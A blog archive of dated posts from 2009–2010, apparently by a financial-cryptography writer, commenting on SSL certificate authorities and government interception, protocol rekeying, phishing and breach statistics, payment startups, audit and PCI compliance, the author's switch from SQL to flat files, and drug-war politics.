    Although numerous online exchanges still act primarily as brokers between employers in rich countries and workers in poorer ones, the number of rich-world freelancers is growing. Gary Swart, the boss of oDesk, says the number of freelancers registered with the firm in America has risen from 28,000 at the end of 2008 to 247,000 at the end of April.

    Back in 1997, I wrote about how to do task markets, and I built a system to do it as well. The system worked fine, but it lacked a couple of key external elements, so I didn't pursue it. Quite a few companies popped up over the next decade, in successive waves, and hit the same barriers.

    Those elements are partly in place these days (but still partly not) so it is unsurprising that companies are getting better at it.

    And, over on this blog by Eric Rescorla, he argues against rekeying in a cryptographically secure protocol:

    It's IETF time again and recently I've reviewed a bunch of drafts concerned with cryptographic rekeying. In my opinion, rekeying is massively overrated, but apparently I've never bothered to comprehensively address the usual arguments.

    Which I wholly concur with, as I've fought about all sorts of agility before (See H1 and H3). Rekeying is yet another sign of a designer gone mad, on par with mumbling to the moon and washing imaginary spots from hands.

    The basic argument here is that rekeying is trying to maintain a clean record of security in a connection; yet this is impossible because there will always be other reasons why the thing fails. Therefore, the application must enjoy the privileges of restarting from scratch, regardless. And, rekeying can be done then, without a problem. QED. What is sad about this argument is that once you understand the architectural issues, it has far too many knock-on effects, ones that might even put you out of a job, so it isn't a *popular argument* amongst security designers.

    Oh well. But it is good to see some challenging of the false gods....

    An article "Why Hawks Win," examines national security, or what passes for military and geopolitical debate in Washington DC.

    In fact, when we constructed a list of the biases uncovered in 40 years of psychological research, we were startled by what we found: All the biases in our list favor hawks. These psychological impulses -- only a few of which we discuss here -- incline national leaders to exaggerate the evil intentions of adversaries, to misjudge how adversaries perceive them, to be overly sanguine when hostilities start, and overly reluctant to make necessary concessions in negotiations. In short, these biases have the effect of making wars more likely to begin and more difficult to end.

    It's not talking about information security, but the analysis seems to resonate. In short, it establishes a strong claim that in a market where there is insufficient information (c.f., the market for silver bullets), we will tend to fall to a FUD campaign. Our psychological biases will carry us in that direction.

    Posted by iang at 09:44 PM | Comments (3) | TrackBack

    March 29, 2010

    Pushing the CA into taking responsibility for the MITM

    This ArsTechnica article explores what happens when the CA-supplied certificate is used as an MITM over some SSL connection to protect online-banking or similar. In the secure-lite model that emerged after the real-estate wars of the mid-1990s, consumers were told to click on their tiny padlock to check the cert:

    Now, a careful observer might be able to detect this. Amazon's certificate, for example, should be issued by VeriSign. If it suddenly changed to be signed by Etisalat (the UAE's national phone company), this could be noticed by someone clicking the padlock to view the detailed certificate information. But few people do this in practice, and even fewer people know who should be issuing the certificates for a given organization.

    Right, so where does this go? Well, people don't notice because they can't. Put the CA on the chrome and people will notice. What then?

    A switch in CA is a very significant event. Jane Public might not be able to do something, but if a customer of Verisign's was MITM'd by a cert from Etisalat, this is something that effects Verisign. We might reasonably expect Verisign to be interested in that. As it effects the chrome, and as customers might get annoyed, we might even expect Verisign to treat this as an attack on their good reputation.

    And that's why putting the brand of the CA onto the chrome is so important: it's the only real way to bring pressure to bear on a CA to get it to lift its game. Security, reputation, sales. These things are all on the line when there is a handle to grasp by the public.

    When the public has no handle on what is going on, the deal falls back into the shadows. No security there, in the shadows we find audit, contracts, outsourcing. Got a problem? Shrug. It doesn't effect our sales.

    So, what happens when a CA MITM's its own customer?

    Even this is limited; if VeriSign issued the original certificate as well as the compelled certificate, no one would be any the wiser. The researchers have devised a Firefox plug-in that should be released shortly that will attempt to detect particularly unusual situations (such as a US-based company with a China-issued certificate), but this is far from sufficient.

    Arguably, this is not an MITM, because the CA is the authority (not the subscriber) ... but exotic legal arguments aside; we clearly don't want it. When it goes on, what we do need is software like whitelisting, like Conspiracy and like the other ideas floating around to do it.

    And, we need the CA-on-the-chrome idea so that the responsibility aspect is established. CAs shouldn't be able to MITM other CAs. If we can establish that, with teeth, then the CA-against-itself case is far easier to deal with.

    Posted by iang at 11:20 PM | Comments (7) | TrackBack

    March 24, 2010

    Why the browsers must change their old SSL security (?) model

    In a paper Certified Lies: Detecting and Defeating Government Interception Attacks Against SSL_, by Christopher Soghoian and Sid Stammby, there is a reasonably good layout of the problem that browsers face in delivering their "one-model-suits-all" security model. It is more or less what we've understood all these years, in that by accepting an entire root list of 100s of CAs, there is no barrier to any one of them going a little rogue.

    Of course, it is easy to raise the hypothetical of the rogue CA, and even to show compelling evidence of business models (they cover much the same claims with a CA that also works in the lawful intercept business that was covered here in FC many years ago). Beyond theoretical or probable evidence, it seems the authors have stumbled on some evidence that it is happening:

    The company’s CEO, Victor Oppelman confirmed, in a conversation with the author at the company’s booth, the claims made in their marketing materials: That government customers have compelled CAs into issuing certificates for use in surveillance operations. While Mr Oppelman would not reveal which governments have purchased the 5-series device, he did confirm that it has been sold both domestically and to foreign customers.

    (my emphasis.) This has been a lurking problem underlying all CAs since the beginning. The flip side of the trusted-third-party concept ("TTP") is the centralised-vulnerability-party or "CVP". That is, you may have been told you "trust" your TTP, but in reality, you are totally vulnerable to it. E.g., from the famous Blackberry "official spyware" case:

    Nevertheless, hundreds of millions of people around the world, most of whom have never heard of Etisalat, unknowingly depend upon a company that has intentionally delivered spyware to its own paying customers, to protect their own communications security.

    Which becomes worse when the browsers insist, not without good reason, that the root list is hidden from the consumer. The problem that occurs here is that the compelled CA problem multiplies to the square of the number of roots: if a CA in (say) Ecuador is compelled to deliver a rogue cert, then that can be used against a CA in Korea, and indeed all the other CAs. A brief examination of the ways in which CAs work, and browsers interact with CAs, leads one to the unfortunate conclusion that nobody in the CAs, and nobody in the browsers, can do a darn thing about it.

    So it then falls to a question of statistics: at what point do we believe that there are so many CAs in there, that the chance of getting away with a little interception is too enticing? Square law says that the chances are say 100 CAs squared, or 10,000 times the chance of any one intercept. As we've reached that number, this indicates that the temptation to resist intercept is good for all except 0.01% of circumstances. OK, pretty scratchy maths, but it does indicate that the temptation is a small but not infinitesimal number. A risk exists, in words, and in numbers.

    One CA can hide amongst the crowd, but there is a little bit of a fix to open up that crowd. This fix is to simply show the user the CA brand, to put faces on the crowd. Think of the above, and while it doesn't solve the underlying weakness of the CVP, it does mean that the mathematics of squared vulnerability collapses. Once a user sees their CA has changed, or has a chance of seeing it, hiding amongst the crowd of CAs is no longer as easy.

    Why then do browsers resist this fix? There is one good reason, which is that consumers really don't care and don't want to care. In more particular terms, they do not want to be bothered by security models, and the security displays in the past have never worked out. Gerv puts it this way in comments:

    Security UI comes at a cost - a cost in complexity of UI and of message, and in potential user confusion. We should only present users with UI which enables them to make meaningful decisions based on information they have.

    They love Skype, which gives them everything they need without asking them anything. Which therefore should be reasonable enough motive to follow those lessons, but the context is different. Skype is in the chat & voice market, and the security model it has chosen is well-excessive to needs there. Browsing on the other hand is in the credit-card shopping and Internet online banking market, and the security model imposed by the mid 1990s evolution of uncontrollable forces has now broken before the onslaught of phishing & friends.

    In other words, for browsing, the writing is on the wall. Why then don't they move? In a perceptive footnote, the authors also ponder this conundrum:

    3. The browser vendors wield considerable theoretical power over each CA. Any CA no longer trusted by the major browsers will have an impossible time attracting or retaining clients, as visitors to those clients’ websites will be greeted by a scary browser warning each time they attempt to establish a secure connection. Nevertheless, the browser vendors appear loathe to actually drop CAs that engage in inappropriate be- havior — a rather lengthy list of bad CA practices that have not resulted in the CAs being dropped by one browser vendor can be seen in [6].

    I have observed this for a long time now, predicting phishing until it became the flood of fraud. The answer is, to my mind, a complicated one which I can only paraphrase.

    For Mozilla, the reason is simple lack of security capability at the *architectural* and *governance* levels. Indeed, it should be noticed that this lack of capability is their policy, as they deliberately and explicitly outsource big security questions to others (known as the "standards groups" such as IETF's RFC committees). As they have little of the capability, they aren't in a good position to use the power, no matter whether they would want to or not. So, it only needs a mildly argumentative approach on the behalf of the others, and Mozilla is restrained from its apparent power.

    What then of Microsoft? Well, they certainly have the capability, but they have other fish to fry. They aren't fussed about the power because it doesn't bring them anything of use to them. As a corporation, they are strictly interested in shareholders' profits (by law and by custom), and as nobody can show them a bottom line improvement from CA & cert business, no interest is generated. And without that interest, it is practically impossible to get the various many groups within Microsoft to move.

    Unlike Mozilla, my view of Microsoft is much more "external", based on many observations that have never been confirmed internally. However it seems to fit; all of their security work has been directed to market interests. Hence for example their work in identity & authentication (.net, infocard, etc) was all directed at creating the platform for capturing the future market.

    What is odd is that all CAs agree that they want their logo on their browser real estate. Big and small. So one would think that there was a unified approach to this, and it would eventually win the day; the browser wins for advancing security, the CAs win because their brand investments now make sense. The consumer wins for both reasons. Indeed, early recommendations from the CABForum, a closed group of CAs and browsers, had these fixes in there.

    But these ideas keep running up against resistance, and none of the resistance makes any sense. And that is probably the best way to think of it: the browsers don't have a logical model for where to go for security, so anything leaps the bar when the level is set to zero.

    Which all leads to a new group of people trying to solve the problem. The authors present their model as this:

    The Firefox browser already retains history data for all visited websites. We have simply modified the browser to cause it to retain slightly more information. Thus, for each new SSL protected website that the user visits, a Certlock enabled browser also caches the following additional certificate information:
    A hash of the certificate.
    The country of the issuing CA.
    The name of the CA.
    The country of the website.
    The name of the website.
    The entire chain of trust up to the root CA.

    When a user re-visits a SSL protected website, Certlock first calculates the hash of the site’s certificate and compares it to the stored hash from previous visits. If it hasn’t changed, the page is loaded without warning. If the certificate has changed, the CAs that issued the old and new certificates are compared. If the CAs are the same, or from the same country, the page is loaded without any warning. If, on the other hand, the CAs’ countries differ, then the user will see a warning (See Figure 3).

    This isn't new. The authors credit recent work, but no further back than a year or two. Which I find sad because the important work done by TrustBar and Petnames is pretty much forgotten.

    But it is encouraging that the security models are battling it out, because it gets people thinking, and challenging their assumptions. Only actual produced code, and garnered market share is likely to change the security benefits of the users. So while we can criticise the country approach (it assumes a sort of magical touch of law within the countries concerned that is already assumed not to exist, by dint of us being here in the first place), the country "proxy" is much better than nothing, and it gets us closer to the real information: the CA.

    From a market for security pov, it is an interesting period. The first attempts around 2004-2006 in this area failed. This time, the resurgence seems to have a little more steam, and possibly now is a better time. In 2004-2006 the threat was seen as more or less theoretical by the hoi polloi. Now however we've got governments interested, consumers sick of it, and the entire military-industrial complex obsessed with it (both in participating and fighting). So perhaps the newcomers can ride this wave of FUD in, where previous attempts drowned far from the shore.

    Posted by iang at 07:52 PM | Comments (1) | TrackBack

    January 21, 2010

    news v. not-news, the great phone-payments debate rumbles on

    Someone told me last night that payments would get better when done on phone! Yessssss.... how does one comment to that? and today I spotted this:

    Everyone's getting real excited about Jack Dorsey, the co-founder of Twitter, and his new payments application for the iPhone called Square.

    OK, except we've seen it all before. Remember Paypal? No, not the one you now know, but the original one, on a PDA. So the process is being repeated. First, do the stuff that looks sexy on the platform that gets you the buzz-appeal. And then, move to where the market is: merchants who pay fees. And, here's where the founder is being more than normally forthright:

    ... the biggest friction point around accepting credit cards is actually getting a merchant account. So being able to become someone who actually can accept a payment off a credit card, off a prepaid card, off a debit card, is actually quite difficult, and it takes a long time – it's a very complicated process. So we wanted to get people in and accepting this new form of payments, and this very widely used form of payments in under 10 seconds.

    Exactly the same. And the one before that -- First Virtual :) And I recall another after that which was popular in the media: peppercoin. And and and... So when Chris Skinner says

    The thing is that Square is good for the American markets, but it is very last century because it focuses upon a card's magnetic stripe and signature for authentication. That's the way Americans pay for things but other markets have moved away from this as it is so insecure.

    He's right in that it is very last century. But Skinner is concentrating on the technology, whereas Dorsey is looking at the market. Thus, maybe right conclusions, but the wrong reasons. What are the right reasons?

    Last century was the century of Central Banking. One of the artifacts of this was that banks and payment systems were twinned, joined at the hip, latter granted as a favour to the former. However as we move forward, several things have loosened that tight grip. Chief amongst them, securitization, the financial crisis, financial cryptography, the cost of hardware and the rise of the net.

    So, the observation of many is that the phone is now the real platform of choice, and not the Xiring, which is just an embarrassing hack in comparison. And, the institution that can couple the phone to the application in a secure and user-friendly way is the winner.

    Question then is, how will this unfold? Well, it will unfold in the normal entrepreneurship fashion. Several waves of better and better payment systems will emerge from the private sector, to compete, live and die and be swallowed by banks. Hundreds of attempts every year, and one success, every year. Gradually, the experiments will pay off, literally and ideas-wise, and gradually people will read the real story about how to do it (you know where) and increase the success ratio from 1:100 to 1:10.

    And, gradually, payments will stand separate from banks. It might take another 20 years, but that's short in the comparison to the time it took for the dinosaurs to fade away, so just be patient.

    Posted by iang at 04:02 PM | Comments (3) | TrackBack

    December 29, 2009

    pushback against the external auditor (if they can do it, so can you!)

    Lynn in comments points to news that Mastercard has eased up on the PCI (association for credit card issuers) standard for merchant auditing:

    But come Dec. 31, 2010, MasterCard planned to require that all Level 1 and, for the first time, Level 2 merchants, use a QSA for the annual on-site PCI assessment.

    (Level 1 merchants are above 6 million transactions per year, with 352 merchants bringing in around 50% of all transactions in the USA. Level 2 merchants are from 1 to 6 million, 895 merchants and 13% of all merchants.)

    Now, this rule would have cost your merchant hard money:

    That policy generated many complaints from Level 2 merchants, who security experts say would have to pay anywhere from $100,000 to $1 million for a QSA’s services.

    These Qualified Security Assessors (QSA) are certified by the PCI Security Standards Council for an on-site assessment, or audit. Because of kickback, complaints, etc, MasterCard backed down:

    This month, however, MasterCard pushed back the deadline by six months, to June 30, 2011. And instead of requiring use of a QSA, MasterCard will let Level 2 merchants do the assessments themselves provided they have staff attend merchant-training courses offered by the PCI Council, and each year pass a PCI Council accreditation program. Level 2 merchants are free to use QSAs if they wish. Come June 30, 2011, Level 1 merchants can use an internal auditor provided the audit staff has PCI Council training and annual accreditation.

    That's you, that is. Or close enough that it hurts. Your company, being a retail merchant bringing in say 100 million dollars a year over 1 million transactions, can now save itself some $100,000 to $1 million. You can do it with your own staff as long as they go on some courses.

    If a merchant with millions to billions of direct value on the line, and measurable losses of say 1% of that (handwave and duck) can choose to self-audit, why can't you?

    Posted by iang at 11:09 AM | Comments (1) | TrackBack

    December 07, 2009

    H4.3 - Simplicity is Inversely Proportional to the Number of Designers

    Which reminds me to push out yet another outrageous chapter in secure protocol design. In my hypothesis #4 on Protocol Design, I claim this:

    #4.3 Simplicity is Inversely Proportional to the Number of Designers
    Never doubt that a small group of thoughtful, committed citizens can change the world. Indeed, it is the only thing that ever has.
    Margaret Mead

    Simplicity is proportional to the inverse of the number of designers. Or is it that complexity is proportional to the square of the number of designers?

    Sad but true, if you look at the classic best of breed protocols like SSH and PGP, they delivered their best results when one person designed them. Even SSL was mostly secure to begin with, and it was only the introduction of PKI with its committees, world-scale identity models, digital signature laws, accountants and lawyers that sent it into orbit around Pluto. Committee-designed monsters such as IPSec and DNSSEC aren't even in the running.

    Sometimes a protocol can survive a team of two, but we are taking huge risks (remember the biggest failure mode of all is failing to deliver anything). Either compromise with your co-designer quickly or kill him. Your users will thank you for either choice, they do not benefit if you are locked in a deadly embrace over the sublime but pernickety benefits of MAC-then-encrypt over encrypt-then-MAC, or CBC versus Counter-mode, or or or...

    More at hypotheses on Secure Protocol Design.

    Posted by iang at 09:04 AM | Comments (3) | TrackBack

    December 05, 2009

    Phishing numbers

    From a couple of sources posted by Lynn:

    • A single run only hits 0.0005 percent of users,
    • 1% of customers will follow the phishing links.
    • 0.5% of customers fall for phishing schemes and compromise their online banking information.
    • the monetary losses could range between $2.4 million and $9.4 million annually per one million online banking clients
    • in average ... approximately 832 a year ... reached users' inboxes.
    • costs estimated at up to $9.4 million per year per million users.
    • based on data colleded from "3 million e-banking users who are customers of 10 sizeable U.S. and European banks."

    The primary source was a survey run by an anti-phishing software vendor, so caveats apply. Still interesting!

    For more meat on the bigger picture, see this article: Ending the PCI Blame Game. Which reads like a compressed version of this blog! Perhaps, finally, the thing that is staring the financial operators in the face has started to hit home, and they are really ready to sound the alarm.

    Posted by iang at 06:35 PM | Comments (1) | TrackBack

    November 26, 2009

    Breaches not as disclosed as much as we had hoped

    One of the brief positive spots in the last decade was the California bill to make breaches of data disclosed to effected customers. It took a while, but in 2005 the flood gates opened. Now reports the FBI:

    "Of the thousands of cases that we've investigated, the public knows about a handful," said Shawn Henry, assistant director for the Federal Bureau of Investigation's Cyber Division. "There are million-dollar cases that nobody knows about."

    That seems to point at a super-iceberg. To some extent this is expected, because companies will search out new methods to bypass the intent of the disclosure laws. And also there is the underlying economics. As has been pointed out by many (or perhaps not many but at least me) the reputation damage probably dwarfs the actual or measurable direct losses to the company and its customers.

    Companies that are victims of cybercrime are reluctant to come forward out of fear the publicity will hurt their reputations, scare away customers and hurt profits. Sometimes they don't report the crimes to the FBI at all. In other cases they wait so long that it is tough to track down evidence.

    So, avoidance of disclosure is the strategy for all properly managed companies, because they are required to manage the assets of their shareholders to the best interests of the shareholders. If you want a more dedicated treatment leading to this conclusion, have a look at "the market for silver bullets" paper.

    Meanwhile, the FBI reports that the big companies have improved their security somewhat, so the attackers direct at smaller companies. And:

    They also target corporate executives and other wealthy public figures who it is relatively easy to pursue using public records. The FBI pursues such cases, though they are rarely made public.

    Huh. And this outstanding coordinated attack:

    A similar approach was used in a scheme that defrauded the Royal Bank of Scotland's (RBS.L: Quote, Profile, Research, Stock Buzz) RBS WorldPay of more than $9 million. A group, which included people from Estonia, Russia and Moldova, has been indicted for compromising the data encryption used by RBS WorldPay, one of the leading payment processing businesses globally.

    The ring was accused of hacking data for payroll debit cards, which enable employees to withdraw their salaries from automated teller machines. More than $9 million was withdrawn in less than 12 hours from more than 2,100 ATMs around the world, the Justice Department has said.

    2,100 ATMs! worldwide! That leaves that USA gang looking somewhat kindergarten, with only 50 ATMs cities. No doubt about it, we're now talking serious networked crime, and I'm not referring to the Internet but the network of collaborating, economic agents.

    Compromising the data encryption, even. Anyone know the specs? These are important numbers. Did I miss this story, or does it prove the FBI's point?

    Posted by iang at 01:23 PM | Comments (0) | TrackBack

    November 08, 2009

    my War On SQL

    Around three weeks ago, I had a data disaster. In a surprise attack, 2 weeks worth of my SQL DATABASE was wiped out. Right after my FIRST weekend demo of some new code. The horror!

    On that Monday morning I went into shell-shock for hours as I tried to trace where the results of the demo -- the very first review of my panzer code -- had disappeared to. By 11:00 there was no answer, and finger-of-blame pointed squarely at some SQL database snafu. The decision was reached to replace the weaponry with tried and trusty blades of all wars previous: flat files, the infantry of data. By the end of the day, the code was written to rebuild the vanguard from its decimated remains, and the next day, work-outs and field exercises proved the results. Two tables entirely replaced, reliably.

    That left the main body, a complex object split across many tables, and the rearguard of various sundry administrative units. It took another week to write the object saving & restoring framework, including streaming, model-objects along the lines of MVC for each element, model-view-controller conversions and unit-testing. (I need a name for this portable object pattern. It came from SOX and I didn't think much of it at the time, but it seems nobody else does it.) Then, some days of unit tests, package tests, field tests, and so forth. Finally, 4-5 days of application re-working to use object database methods, not SQL.

    16 days later, up and going. The army is on the march, SQL is targetted, acquired, destroyed. Defeated, wiped off the map, no longer to blot on the territory of my application. 2 days of mop-up and I'm back to the demo.

    Why go on a holy crusade against SQL? There are several motives for this war:

    • Visibility. Like all databases, SQL is a black box. How exactly do you debug an application sitting on a black box?
    • Visibility #2. When it goes wrong, the caller/user/owner is powerless to fix it. It's a specialist task to even see inside.
    • Generalist. This database is lightweight, indeed it's called SQLite. The point isn't that it is "worse" than the rest, but that it'll have to be replaced one day. Why? All of these things are generalists and cannot cope with narrow, precise requirements. In other words, they look good on the parade ground, but when the shooting starts, the only order is "retreat!"
    • Achilles heel: backups have to manually created, recovered, tested on a routine basis. Yet this never gets done, and when the data corrupts, it is too late. Making backups easy is the #1 priority of all databases. Did you know that? Funnily enough, neither did any of the database providers.

    And then there's the interface. Let us not shame the mere technical _casus belli_ above, let us put the evil that is SQL in a section of abomination, all of its own:

    SQL is in the top 5 of the computing world's most awful anachronisms. It's right up there with ASN1, X.509, LDAP, APL, and other embarrassments to the world of computer science. In this case, there is one reason why SQL stands out like the sideways slice of death of a shamed samurai: data! these things, SQL included, were all designed when data was king, we all had to bow before the august power of our corporate bytes, while white-suited priests inserted the holy decks and the tapes of glory into bright shining temples of the mainframe of enlightenment.

    But those imperial times are over. The false data-is-god was slain, discarded and buried, in the glorious & bloody revolution of the Object, that heathen neologism that rose up and slew and enslaved data during the early 1980s. Data-only is slain, data is dead. Data is captured, enslaved, owned. It is now objects, objects, objects. Data is an immoral ghost of its former self, when let out from its rightful context of semantic control.

    These are the reasons why I leapt to the field to do battle to the death with the beast that is SQL. My report from the field is as follows:

    • operating from a flat files data store is slower and faster, depending on the type of action. Direct actions by my code are slower than SQL, but complicated actions are quicker. Overall, we are talking 10 - 50ms, so it is all in the "whatever" rating.
    • Code overall is dramatically simpler. There is no need to emasculate the soul of ones object model. Simply store the object, and get back to the fight. The structure of the code, the design, is simplified as the inherently senseless interface of OO to SQL is gone, it is now more OO, more top-to-bottom.
    • Joins have to be done in main code. This is an advantage for the coder, because the coder knows the main code, and the main language.
    • debugging is much easier because the data can be read, those times that is necessary, and the data can be seen, which is necessary all the time.
    • object transactions are trivial. Cross-object transactions are tricky. This forces the general in the field to be much more balanced.
    • no data is ever lost. At least, in my design, it can't be lost by action of the code, as everything is append-only.
    • it is uses about 5 times more space on the battlefield of your diskspace. Another "whatever..."
    • The code length is about the same. What was additionally required in database code (1kloc) was taken away in awfully complicated SQL interfacing code that melted away. The "Model" code, that is, the objects to be saved is an additional 1kloc, but required anyway for clean OO design.

    I continue to mop up. What's the bottom line? Control. The application controls the objects and the objects control their data.

    So what went wrong with SQL? Fundamentally it was designed in a day when data was seriously different. Those days are gone, now data is integrally related to code. It's called "object oriented" and even if you don't know how to do it, it is how it is doing it to you. The object owns the data, not the database. Data seen naked is an abomination, and SQL is just rags on a beast; it's still a beast.

    Sadly, the world is still a decade or two away from this. And, to be fair, hattip to Jeroen van Gelderen for the OO database he designed and built for Webfunds. Using that was a lesson in how much of a delight it was to be OO all the way down to the disk-byte.

    Posted by iang at 02:53 AM | Comments (9) | TrackBack

    November 07, 2009

    The War on Drugs moves to endgame: the War on US Americans

    The decision to conduct a war on drugs was inevitably a decision to hollow-out Mexico. The notion of hollowing-out states is a time-honoured tradition in the Great Game, the way you control remote and wild places. The essential strategy is that you remove the institutions that keep places strong and stable, and bring them to a chaos which then keeps the countries fighting each other.

    While they fight each other they are easier to control and extract value from. This is the favourite conspiracy theory behind the middle east and the famous Kissinger Deal: The Sheiks are propped up and given control of weak states as long as they trade their oil in dollars, and use the money to buy American goods. Of course we only speculate these details, and sometimes things look a little loose.

    There are weaknesses in the strategy. Obviously, we are playing with fire when hollowing out a state ... so this is quite a lot of danger to the nearby states. (Which of course leads to the next part of the strategy, to play fire against fire and undermine an entire region.)

    Which brings us to the War on Drugs and the decision to place Mexico into the role of hollowed-out state. John Robb points to this article:

    Beheadings and amputations. Iraqi-style brutality, bribery, extortion, kidnapping, and murder. More than 7,200 dead-almost double last year's tally-in shoot-outs between federales and often better-armed drug cartels. This is modern Mexico, whose president, Felipe Calderón, has been struggling since 2006 to wrest his country from the grip of four powerful cartels and their estimated 100,000 foot soldiers.

    So, quite obviously if one understands the strategy, don't do this nearby. Do it far away. Reagan's famous decision to do this must have been taken on one his less memorable days ... no matter how the decision was taken on Mexico, now Reagan's chickens have cross the border to roost in mainland USA:

    But chillingly, there are signs that one of the worst features of Mexico's war on drugs - law enforcement officials on the take from drug lords - is becoming an American problem as well. Most press accounts focus on the drug-related violence that has migrated north into the United States. Far less widely reported is the infiltration and corruption of American law enforcement, according to Robert Killebrew, a retired U.S. Army colonel and senior fellow at the Washington-based Center for a New American Security. "This is a national security problem that does not yet have a name," he wrote last fall in The National Strategy Forum Review. The drug lords, he tells me, are seeking to "hollow out our institutions, just as they have in Mexico."

    Quite what is going on in these people's minds is unclear to me. The notion that it "has no name" is weird: it's the standard strategy with the standard caveat. They overdid the prescription, now the disease bounces back stronger, more immune, with a vengeance! Further, I don't actually think it is possible to ascribe this as a deliberate plot by the Mexican drug lords, because it is already present in the USA:

    Experts disagree about how deep this rot runs. Some try to downplay the phenomenon, dismissing the law enforcement officials who have succumbed to bribes or intimidation from the drug cartels as a few bad apples. Peter Nuñez, a former U.S. attorney who lectures at the University of San Diego, says he does not believe that there has been a noticeable surge of cartel-related corruption along the border, partly because the FBI, which has been historically less corrupt than its state and local counterparts, has significantly ratcheted up its presence there. "It's harder to be as corrupt today as locals were in the 1970s, when there wasn't a federal agent around for hundreds of miles," he says.

    But Jason Ackleson, an associate professor of government at New Mexico State University, disagrees. "U.S. Customs and Border Protection is very alert to the problem," he tells me. "Their internal investigations caseload is going up, and there are other cases that are not being publicized." While corruption is not widespread, "if you increase the overall number of law enforcement officers as dramatically as we have| - from 9,000 border agents and inspectors prior to 9/11 to a planned 20,000 by the end of 2009 - "you increase the possibility of corruption due to the larger number of people exposed to it and tempted by it." Note, too, that Drug Enforcement Agency data suggest that Mexican cartels are operating in at least 230 American cities.

    By that I mean, the drug situation has already corrupted large parts of the USA governance structure. I've personally heard of corruption stories in banks, politics, police and as far up the pecking order as FINCEN, intel agencies and other powerful agencies. As an outside observer it looks to me like they've made their peace with the drugs a long time ago, heaven knows what it looks like to a real insider.

    So I see a certain sense of hubris in these writings. This feels to me that the professional journalist did not want to talk about the corruption that has always been there (e.g., how else did the stuff get distributed before?). What seems to be happening is that now that Mexico is labelled in the serious press (*) as hollowed-out, it has become easier to talk about the problem in mainstreet USA because we can cognitively blame the Mexicans. Indeed, the title of the piece is The Mexicanization of American Law Enforcement:

    And David Shirk, director of the San Diego-based Trans-Border Institute and a political scientist at the University of San Diego, says that recent years have seen an "alarming" increase in the number of Department of Homeland Security personnel being investigated for possible corruption. "The number of cases filed against DHS agents in recent years is in the hundreds," says Shirk. "And that, obviously, is a potentially huge problem." An August 2009 investigation by the Associated Press supports his assessment. Based on records obtained under the Freedom of Information Act, court records, and interviews with sentenced agents, the AP concluded that more than 80 federal, state, and local border-control officials had been convicted of corruption-related crimes since 2007, soon after President Calderón launched his war on the cartels. Over the previous ten months, the AP data showed, 20 Customs and Border Protection agents alone had been charged with a corruption-related crime. If that pace continued, the reporters concluded, "the organization will set a new record for in-house corruption."

    Well, whatever it takes. If the US-Americans have to blame the Mexican-Americans in order to focus on the real problems, that might be the cost of getting to the real solution: the end of Prohibition. Last word to Hayden, no stranger to hubris:

    Michael Hayden, director of the Central Intelligence Agency under President George W. Bush, called the prospect of a narco-state in Mexico one of the gravest threats to American national security, second only to al-Qaida and on par with a nuclear-armed Iran. But the threat to American law enforcement is still often underestimated, say Christesen and other law enforcement officials.

    * Mind you, I do not see how they are going to blame the Mexicans for the hollowing-out of the mainstream press. Perhaps the Canadians?

    Posted by iang at 09:37 AM | Comments (5) | TrackBack

    October 25, 2009

    Audits VI: the wheel spins. Until?

    We've established that Audit isn't doing it for us (I, II, III). And that it had its material part to play in the financial crisis (IV). Or its material non-part (II). I think I've also had a fair shot at explaining why this happened (V).

    I left off last time asking why the audit industry didn't move to correct these things, and especially why it didn't fight Sarbanes-Oxley as being more work for little reward? In posts that came afterwards, thanks to Todd Boyle, it is now clear that the audit industry will not stand in front of anything that allows its own house to grow. The Audit Industry is an insatiable growth machine, and this is its priority. No bad thing if you are an Auditor.

    Which leaves us with curious question: What then stops the Audit from growing without bound? What force exists to counterbalance the natural tendency of the auditor to increase the complexity, and increase the bills? Can we do SOX-1, SOX-2, SOX-3 and each time increase the cost?

    Those engineers and others familiar with "systems theory" among us will be thinking in terms of feedback: all sustainable systems have positive feedback loops which encourage their growth, and negative feedback loops which stop their growth exploding out of control. In earlier posts, we identify the positive feedback loop of the insider interest. The question would then be (for the engineers) what is the negative feedback control?

    Wikipedia helpfully suggests that Audit is a feedback control over organisations, but where is the feedback control over Audit? Even accepting the controversial claim that Sarbanes-Oxley delivered better reliability and quality in audits, we do know there must be a point where that quality is too expensive to pay for. So there must be a limit, and we must know when to stop paying.

    And now the audit penny drops: There is no counterbalancing force!

    We already established that the outside world has no view into the audit. Our chartered outsider has taken the keys to the citadel and now owns the most inner sanctums. The insider operates to standard incentives which is to improve own position at the expense of the outsider; the Auditor is now the insider. Which leads to a compelling desire to increase size, complexity and fees of Audit.

    Yet the machine of audit growth has no brake. So it has no way to stop it moving from a useful position of valuable service to society to an excessive position of unsustainable drain on the public welfare. There is nothing to stop audit consuming the host it parasites off, nor is there anything that keeps even the old part of the Audit on the straight and narrow.

    And this is more or less what has happened. That which was useful 30 years ago -- the opinion of financial statements, useful to educated investors -- has migrated well beyond that position into consuming the very core of the body corporate. IT security audits, industry compliance audits, quality audits, consulting engagements, market projects, manufacturing advice, and the rest of it now consume far more of their proper share.

    Many others will point at other effects. But I believe this is at the core of it: the auditor promises a result for outsiders, has taken the insiders' keys and crafted a role of great personal benefit, without any external control. So it follows that it must grow, and it must drift off any useful agenda. And so it has, as we see from the financial crisis.

    Which leads to a rather depressing conclusion: Audit cannot regulate itself. And we can't look to the government to deal with it, because that was part & parcel of our famous financial crisis. Indeed, the agencies have their hands full right now making the financial crisis worse, we hardly want to ask them to fix this mess. Today's evidence of agency complicity is only just more added to a mountain of depression.

    What's left?

    Posted by iang at 08:46 PM | Comments (2) | TrackBack

    October 12, 2009

    How the FATF brought down modern civilisation and sent us all to retire in Mexico

    Nobody likes criminals. Even criminals don't like criminals; they are unfair competition.

    So it is with some satisfaction that our civilisation has worked for a 1000 years to suppress the criminal within; going back to the Magna Carta where the institution of the monarch was first separated from the money making classes, and the criminal classes, both. Over time, this genesis was developed to create the rights of the people to hold assets, and the government as firmly oriented to defending those rights.

    One of those hallowed principles was that of consolidated revenue. This boring, dusty old thing was a foundation for honest government because it stopped any particular agency from becoming a profitable affair. That is, no longer government for the people, but one of the money making or money stealing classes mentioned above.

    Consolidated Revenue is really simple: all monies collected go to the Treasury and are from there distributed according to the budget process. Hence, all monies collected, for whatever purpose, are done so on a policy basis, and are checked by the entire organisation. If you have Budget Day in your country, that means the entire electorate. Which latter, if unhappy, throws the whole sorry group out on the streets every electoral cycle, and puts an entirely new group in to manage the people's money.

    This simple rule separates the government from the profit-making classes and the criminal classes. Break it at your peril.

